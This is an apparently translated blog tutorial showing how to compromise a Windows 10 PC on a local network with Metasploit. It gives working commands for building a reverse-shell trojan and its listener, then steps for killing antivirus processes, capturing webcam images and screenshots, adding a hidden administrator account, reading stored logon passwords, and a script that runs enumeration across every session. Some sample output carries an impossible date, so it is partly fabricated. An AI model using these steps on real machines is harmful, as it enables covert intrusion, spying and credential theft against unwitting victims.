Penetrating Windows Devices on a LAN with Metasploit
Warning
Do not use any technique mentioned in this article for illegal purposes.
Comply with the Criminal Law of the People's Republic of China, the Cybersecurity Law of the People's Republic of China, the Public Security Administration Punishments Law of the People's Republic of China and/or other applicable local laws and regulations.
License
This article is provided "as is", without warranty of any kind, express or implied, including but not limited to warranties of fitness for a particular purpose, correctness, or the legality of any use case. Under no circumstances shall the author be liable for, or compensate, any consequences arising from the reader's use of the content mentioned in this article.
This work is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License (CC BY-SA 4.0).
Copyright © 2020, 还没想好昵称的新建p
The full text of "Warning" and "License" must be included verbatim in every redistributed copy of this article, whether or not the content has been modified.
If you do not agree with any item in the license, do not continue reading or redistributing, and close this page.
Environment and Conventions
Unless otherwise stated, the IP addresses and version information of the attacker and the victim (target) referred to in this article are as follows.
Attacker: 192.168.1.233, Kali Linux
Victim: 192.168.1.100, Windows 10 Pro physical machine, version 20H2, Windows Defender Antivirus (Security intelligence version 1.327.1470.0)
To protect privacy, the computer names, IP addresses and similar details in this article are fictitious.
This article has two parts: the pre-exploitation phase and the post-exploitation phase. The pre-exploitation phase covers generating the trojan and other preparation; the post-exploitation phase covers the attack actions themselves.
Pre-exploitation Phase
First, discover all live hosts on the LAN with a ping scan (-sP is the old name of -sn: host discovery only, no port scan)
nmap -sP 192.168.1.1/24
Then generate the trojan, a Meterpreter reverse TCP stager packaged as an .exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.233 lport=2333 -f exe R > ~/shell.exe
Here lhost is the attacker's IP address, the one the trojan connects back to, and lport is the port on the attacker's machine it connects to. The trailing R is a leftover from the old msfpayload syntax (raw output) and has no effect in msfvenom; the output path is set by the shell redirect > ~/shell.exe (msfvenom's own -o ~/shell.exe does the same without the redirect). The file contains only the first stage (the stager): the actual Meterpreter is sent by the handler once the connection is established.
Next, open msfconsole.
msfconsole
Once inside msfconsole you will see the banner and the msf5 > prompt. Enter the following in order
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.233
msf5 exploit(multi/handler) > set lport 2333
Here, use exploit/multi/handler selects the module and prints
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) >
set payload windows/meterpreter/reverse_tcp sets the payload to the reverse TCP Meterpreter, the same one msfvenom generated; you will see
payload => windows/meterpreter/reverse_tcp
set lhost 192.168.1.233 and set lport 2333 must match the IP address and port given to msfvenom above; you will see
lhost => 192.168.1.233
lport => 2333
Now launch the attack by entering
exploit
exploit runs the handler in the foreground and drops you into the first session that connects; exploit -j runs it as a background job instead, so the listener keeps accepting further connections. Then run the trojan you just generated on the victim (target). Windows Defender Antivirus flags the file, so you have to allow the threat in Defender first (otherwise it cannot even be copied onto the machine).
You will see
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.233:2333
[*] Sending stage (176195 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.233:2333 -> 192.168.1.100:49395) at 2020-02-30 23:23:33 +0800
meterpreter >
At this point the trojan is running on the target and you are at the meterpreter prompt of the new session.
Post-exploitation Phase
Backgrounding the session
To return from meterpreter to the msf prompt, enter
background
Switching between sessions
In msf, list the currently active sessions with
sessions -l
and switch to a session with
sessions -i 1
where 1 is the session ID (use the ID printed when the session opened; in the output above it was 2).
Killing antivirus software
The following command tries to kill antivirus processes. killav is a deprecated Meterpreter script that walks a fixed list of process names and terminates whatever matches; as the output shows, on this target it only killed Taskmgr.exe and cmd.exe. Windows Defender's engine (MsMpEng.exe) runs as a protected process and cannot be terminated this way, even from SYSTEM, so this does not disable Defender.
run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value […]
[*] Killing Antivirus services on the target…
[*] Killing off Taskmgr.exe…
[*] Killing off cmd.exe…
[*] Killing off cmd.exe…
Target information
Use the following command to view the target's computer name, operating system, architecture, system language, domain, number of logged-on users and so on
sysinfo
Checking whether the target is a physical or virtual machine
Enter
run post/windows/gather/checkvm
On a virtual machine you will see [+] This is a VMware Virtual Machine
On a physical machine you will see [*] DESKTOP-2333333 appears to be a Physical Machine
Using the Windows shell
To get a shell on the target, enter
shell
You are now in the target's cmd.
Process 23333 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.630]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\Users\Username\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2333-2333
Directory of C:\Users\Username\Desktop
02/30/2020 23:33 <DIR> .
02/30/2020 23:33 <DIR> ..
To leave cmd and return to meterpreter, type exit.
Accessing the file system
You can use these commands to access the file system
cd    change directory
cat   print a file's contents
rm    delete a file
edit  edit a file in vim
ls    list the files in the current directory
pwd   print the current working directory
mkdir create a directory
rmdir remove a directory
Use the following commands to download files from, or upload files to, the target
download [options] src1 src2 src3 ... destination
upload [options] src1 src2 src3 ... destination
Applications
Use the following command to list the programs and features installed on the target
run post/windows/gather/enum_applications
Use the execute command to run a program on the target; the syntax is
execute -f file [options]
-H  run the process hidden
-a  pass arguments to the process
-i  interact with the process after creating it
-m  execute from memory
-t  execute using the currently impersonated thread token
-s  execute in the given session (takes a session ID)
Webcam
Use the following commands to list webcams, take a snapshot, and start a video stream respectively
webcam_list
This lists the target's webcams:
1: NewTek NDI Video
2: OBS-Camera
3: OBS-Camera2
4: OBS-Camera3
5: OBS-Camera4
Take a snapshot with
webcam_snap
Start a stream with the following command; it opens a browser to play the video
webcam_stream
About virtual cameras
If the target uses a virtual camera built on OBS Studio and CatxFish/obs-virtual-cam, opening the camera appears to fail (usually error 14007 or 731), but NDI's Virtual Input works. The author achieved the result shown in the screenshot above with NewTek NDI for Adobe Creative Cloud and Adobe Premiere Pro 2020.
See also my blog post on configuring a virtual camera with OBS.
Screenshots
Take a screenshot of the target's desktop with
screenshot
User operations
List the currently logged-on and recently logged-on users with
run post/windows/gather/enum_logged_on_users
Create a user in the Administrators group with
run getgui -u Username -p Password
where -u is followed by the username and -p by the password. getgui is a deprecated Meterpreter script that enables Remote Desktop on the target and creates the account, adding it to the Administrators and Remote Desktop Users groups; it needs an elevated (administrator or SYSTEM) session to succeed.
If the target user logs on automatically, read the auto-logon password (stored in clear text in the Winlogon registry key) with
run post/windows/gather/credentials/windows_autologin
Privilege escalation
The following command attempts to escalate privileges, but in testing on Windows 10 it had no effect
getsystem
getsystem needs a session that already holds administrator rights (high integrity), which it then escalates to SYSTEM. A session obtained by running the trojan as a standard user, or as an administrator behind UAC, runs at medium integrity, which is why it fails here; getuid shows the user and getprivs the privileges the session actually holds.
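The enumeration steps of this phase (sysinfo, checkvm, enum_applications, enum_logged_on_users, screenshot) batched into a Metasploit resource file that runs them on every open session, as an added example that is not part of the original post. It assumes the file is written to ~/post.rc and loaded from the live console with resource ~/post.rc once at least one session is open.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): batch the post-exploitation
# enumeration across all open Meterpreter sessions from a resource file.
# Assumed file name: ~/post.rc, loaded inside a live console with
#   msf5 > resource ~/post.rc
set -eu

# "sessions -C <cmd>" runs one Meterpreter command, and "sessions -s <module>"
# runs a script or post module, on every open session (add -i <id> to limit
# either to a single session).
write_post_rc() {
  cat > "$1" <<'EOF'
sessions -l
sessions -C sysinfo
sessions -C getuid
sessions -s post/windows/gather/checkvm
sessions -s post/windows/gather/enum_applications
sessions -s post/windows/gather/enum_logged_on_users
sessions -C screenshot
EOF
  printf '%s\n' "$1"
}

# Count how many per-session actions a generated file dispatches.
count_session_actions() {
  grep -c '^sessions -[Cs] ' "$1"
}

if [ "${1:-}" = "run" ]; then
  rc=$(write_post_rc "$HOME/post.rc")
  echo "[*] wrote $rc with $(count_session_actions "$rc") per-session actions"
  echo "[*] load it from the console with: resource $rc"
fi
```

screenshot writes its image into msfconsole's current directory; the post modules that collect data (enum_applications, enum_logged_on_users) store their findings under ~/.msf4/loot, which is where to look after the resource file has run.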
Appendix: Meterpreter commands
Type ? to view the help.
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Enjoy it!
Parts of this article refer to the blog post 《Metasploit Framework(MSF)的使用》 (Using the Metasploit Framework).